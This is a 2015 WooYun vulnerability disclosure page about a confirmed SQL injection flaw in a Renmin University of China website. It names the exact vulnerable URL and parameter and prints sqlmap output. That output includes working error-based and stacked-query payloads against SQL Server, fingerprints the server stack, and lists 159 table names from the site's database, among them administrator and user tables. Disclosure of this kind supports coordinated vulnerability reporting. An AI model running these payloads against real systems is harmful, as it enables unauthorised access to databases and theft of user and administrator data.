当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156790

漏洞标题:中国人民大学某站存在SQL注入漏洞

相关厂商:中国人民大学

漏洞作者: 路人甲

提交时间:2015-11-30 11:46

修复时间:2016-01-15 09:14

公开时间:2016-01-15 09:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经确认,细节仅向厂商公开
2015-12-11: 细节向核心白帽子及相关领域专家公开
2015-12-21: 细节向普通白帽子公开
2015-12-31: 细节向实习白帽子公开
2016-01-15: 细节向公众公开

简要描述:

详细说明:

http://eemd.phys.ruc.edu.cn/LiveFiles/Pages/Inner/count.aspx?ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111
涉及17个库:

111.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userName (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111' AND 5013=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (5013=5013) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'ckja'='ckja
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111';WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: eemd
[159 tables]
+--------------------------------+
| ask_Ad |
| ask_Announcement |
| ask_Answers |
| ask_Catalog |
| ask_Configuration |
| ask_CreditRule |
| ask_CreditRuleLog |
| ask_Expert |
| ask_Links |
| ask_Question |
| ask_UserGroup |
| ask_Users |
| ask_Votes |
| b2c_Ad |
| b2c_Advertisement |
| b2c_Brand |
| b2c_Category |
| b2c_CategoryGroup |
| b2c_Configuration |
| b2c_ContentGroup |
| b2c_ContentModel |
| b2c_GoodsLink |
| b2c_GoodsPhoto |
| b2c_GoodsType |
| b2c_Log |
| b2c_RelatedField |
| b2c_RelatedFieldItem |
| b2c_Shop |
| b2c_Star |
| b2c_StarSetting |
| b2c_StlTag |
| b2c_Supplier |
| b2c_SystemPermissions |
| b2c_Tag |
| b2c_TagStyle |
| b2c_Template |
| b2c_TemplateMatch |
| b2c_UserGroup |
| b2c_Users |
| bairong_Administrator |
| bairong_AdministratorsInRoles |
| bairong_Cache |
| bairong_Card |
| bairong_CardType |
| bairong_Config |
| bairong_ContentModel |
| bairong_Count |
| bairong_Digg |
| bairong_IP2City |
| bairong_Log |
| bairong_Module |
| bairong_PayRecord |
| bairong_Payment |
| bairong_PermissionsInRoles |
| bairong_Roles |
| bairong_SSOApp |
| bairong_TableCollection |
| bairong_TableMatch |
| bairong_TableMetadata |
| bairong_TableStyle |
| bairong_TableStyleItem |
| bairong_Tags |
| bairong_UserAddCard |
| bairong_UserBinding |
| bairong_UserConfig |
| bairong_UserConsume |
| bairong_UserCreditsLog |
| bairong_UserMessage |
| bairong_UserType |
| bairong_Users |
| bairong_Vote |
| bairong_VoteIPAddress |
| bairong_VoteItem |
| bbs_Ad |
| bbs_Announcement |
| bbs_Attachment |
| bbs_AttachmentType |
| bbs_Configuration |
| bbs_CreditRule |
| bbs_CreditRuleLog |
| bbs_Face |
| bbs_Forum |
| bbs_Icon |
| bbs_Identify |
| bbs_KeywordsCategory |
| bbs_KeywordsFilter |
| bbs_Link |
| bbs_Navigation |
| bbs_Online |
| bbs_Permissions |
| bbs_Poll |
| bbs_PollItem |
| bbs_PollUser |
| bbs_Post |
| bbs_Report |
| bbs_Thread |
| bbs_ThreadCategory |
| bbs_UserGroup |
| bbs_Users |
| liveserver_Activity |
| liveserver_BlogCategory |
| liveserver_BlogContent |
| liveserver_Comment |
| liveserver_Configuration |
| liveserver_Favorite |
| liveserver_Friends |
| liveserver_Message |
| liveserver_MyWeb |
| liveserver_PhotoContent |
| liveserver_PhotoContentsInSets |
| liveserver_PhotoSet |
| liveserver_Rss |
| liveserver_Tag |
| liveserver_UserContent |
| liveserver_Users |
| liveserver_Visitors |
| liveserver_Word |
| siteserver_Ad |
| siteserver_Advertisement |
| siteserver_Comment |
| siteserver_Configuration |
| siteserver_Content |
| siteserver_ContentGroup |
| siteserver_GatherDatabaseRule |
| siteserver_GatherFileRule |
| siteserver_GatherRule |
| siteserver_InnerLink |
| siteserver_Input |
| siteserver_InputContent |
| siteserver_JobContent |
| siteserver_Log |
| siteserver_Machine |
| siteserver_MailSendLog |
| siteserver_MailSubscribe |
| siteserver_MenuDisplay |
| siteserver_Node |
| siteserver_NodeGroup |
| siteserver_PagePermissions |
| siteserver_PhotoContent |
| siteserver_PublishmentSystem |
| siteserver_RelatedField |
| siteserver_RelatedFieldItem |
| siteserver_ResumeContent |
| siteserver_SeoMeta |
| siteserver_SeoMetasInNodes |
| siteserver_Star |
| siteserver_StarSetting |
| siteserver_StlTag |
| siteserver_SystemPermissions |
| siteserver_TagStyle |
| siteserver_Task |
| siteserver_TaskLog |
| siteserver_Template |
| siteserver_TemplateMatch |
| siteserver_TemplateRule |
| siteserver_Tracking |
| siteserver_UserContent |
| siteserver_UserGroup |
| siteserver_Users |
+--------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-12-01 09:12

厂商回复:

确认,已通知相关人员进行处理

最新状态:

暂无


漏洞评价:

评价